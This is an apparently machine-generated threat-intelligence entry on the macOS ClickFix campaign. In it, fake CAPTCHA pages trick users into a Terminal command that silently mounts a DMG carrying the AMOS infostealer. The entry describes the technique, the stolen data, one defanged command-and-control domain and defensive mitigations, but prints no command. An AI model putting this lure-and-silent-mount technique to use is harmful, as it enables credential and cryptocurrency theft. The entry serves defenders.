New macOS ClickFix attack silently mounts DMGs to push infostealer
A new macOS malware campaign called ClickFix uses social engineering to trick users into running a malicious Terminal command that silently downloads, mounts, and executes a disk image (DMG) containing the Atomic macOS Stealer (AMOS) infostealer. This malware steals browser credentials, cryptocurrency wallet data, Keychain data, messaging app information, and user documents. The attack begins with a fake CAPTCHA page instructing users to paste a Terminal command, which downloads and mounts the malicious DMG without user visibility. The stealer targets multiple Chromium- and Firefox-based browsers, various cryptocurrency wallets, Telegram Desktop, Discord, Apple Notes, Safari cookies, and Apple Keychain. It also replaces legitimate Ledger Live and Trezor Suite installations with malicious versions to facilitate crypto theft. The stolen data is archived and uploaded to attacker-controlled servers. Users are advised to be cautious about executing Terminal commands from untrusted sources.
AI Analysis
Technical Summary
The ClickFix macOS campaign employs social engineering by presenting fake CAPTCHA pages that instruct victims to execute a Terminal command. This command silently downloads a malicious DMG file from attacker-controlled servers, mounts it using macOS's hdiutil utility with the -nobrowse flag to avoid user detection, and automatically launches the contained malicious application. The payload is the Atomic macOS Stealer (AMOS), which harvests sensitive data including credentials from eight Chromium-based browsers and multiple Firefox derivatives, cryptocurrency wallet data from numerous wallet applications, messaging app data (Telegram Desktop and Discord), Apple Notes, Safari cookies, Apple Keychain, and user documents with PDF, TXT, or RTF extensions. The malware also replaces legitimate cryptocurrency management software (Ledger Live and Trezor Suite) with malicious versions to facilitate theft. All collected data is compressed and exfiltrated to attacker servers. The campaign was discovered by Palo Alto Networks Unit 42 and uses command-and-control domains such as svs-verificationdate[.]beer. This attack leverages a combination of social engineering and native macOS utilities to evade detection and automate malware execution.
Potential Impact
The campaign results in the compromise of sensitive user data including browser credentials, stored payment cards, authentication tokens, cryptocurrency wallets, messaging app data, Apple Keychain passwords, and user documents. The replacement of legitimate Ledger Live and Trezor Suite applications with malicious versions poses a direct risk of cryptocurrency theft. The silent mounting and execution of malware without user awareness increases the likelihood of successful infection. This can lead to significant privacy breaches, financial loss, and unauthorized access to personal and corporate accounts.
Mitigation Recommendations
No official patch or fix is available as this is a social engineering attack leveraging native macOS utilities. Users should be educated to never execute Terminal commands from untrusted or suspicious sources, especially those presented as CAPTCHA verifications or system fixes. Security teams should raise awareness about the ClickFix technique and monitor for suspicious use of hdiutil and unexpected DMG mounts. Since the attack relies on user interaction, user training and caution are the primary mitigations. There is no indication that vendor patches or updates can prevent this attack directly.
New macOS ClickFix attack silently mounts DMGs to push infostealer
Description
A new macOS malware campaign called ClickFix uses social engineering to trick users into running a malicious Terminal command that silently downloads, mounts, and executes a disk image (DMG) containing the Atomic macOS Stealer (AMOS) infostealer. This malware steals browser credentials, cryptocurrency wallet data, Keychain data, messaging app information, and user documents. The attack begins with a fake CAPTCHA page instructing users to paste a Terminal command, which downloads and mounts the malicious DMG without user visibility. The stealer targets multiple Chromium- and Firefox-based browsers, various cryptocurrency wallets, Telegram Desktop, Discord, Apple Notes, Safari cookies, and Apple Keychain. It also replaces legitimate Ledger Live and Trezor Suite installations with malicious versions to facilitate crypto theft. The stolen data is archived and uploaded to attacker-controlled servers. Users are advised to be cautious about executing Terminal commands from untrusted sources.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The ClickFix macOS campaign employs social engineering by presenting fake CAPTCHA pages that instruct victims to execute a Terminal command. This command silently downloads a malicious DMG file from attacker-controlled servers, mounts it using macOS's hdiutil utility with the -nobrowse flag to avoid user detection, and automatically launches the contained malicious application. The payload is the Atomic macOS Stealer (AMOS), which harvests sensitive data including credentials from eight Chromium-based browsers and multiple Firefox derivatives, cryptocurrency wallet data from numerous wallet applications, messaging app data (Telegram Desktop and Discord), Apple Notes, Safari cookies, Apple Keychain, and user documents with PDF, TXT, or RTF extensions. The malware also replaces legitimate cryptocurrency management software (Ledger Live and Trezor Suite) with malicious versions to facilitate theft. All collected data is compressed and exfiltrated to attacker servers. The campaign was discovered by Palo Alto Networks Unit 42 and uses command-and-control domains such as svs-verificationdate[.]beer. This attack leverages a combination of social engineering and native macOS utilities to evade detection and automate malware execution.
Potential Impact
The campaign results in the compromise of sensitive user data including browser credentials, stored payment cards, authentication tokens, cryptocurrency wallets, messaging app data, Apple Keychain passwords, and user documents. The replacement of legitimate Ledger Live and Trezor Suite applications with malicious versions poses a direct risk of cryptocurrency theft. The silent mounting and execution of malware without user awareness increases the likelihood of successful infection. This can lead to significant privacy breaches, financial loss, and unauthorized access to personal and corporate accounts.
Mitigation Recommendations
No official patch or fix is available as this is a social engineering attack leveraging native macOS utilities. Users should be educated to never execute Terminal commands from untrusted or suspicious sources, especially those presented as CAPTCHA verifications or system fixes. Security teams should raise awareness about the ClickFix technique and monitor for suspicious use of hdiutil and unexpected DMG mounts. Since the attack relies on user interaction, user training and caution are the primary mitigations. There is no indication that vendor patches or updates can prevent this attack directly.
Technical Details
- Article Source
- {"url":"https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/","fetched":true,"fetchedAt":"2026-06-23T18:40:27.259Z","wordCount":958}
Threat ID: 6a3ad31beed863c81e7555c0
Added to database: 06/23/2026, 18:40:27 UTC
Last enriched: 06/23/2026, 18:40:38 UTC
Last updated: 06/23/2026, 20:52:09 UTC
Views: 5
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.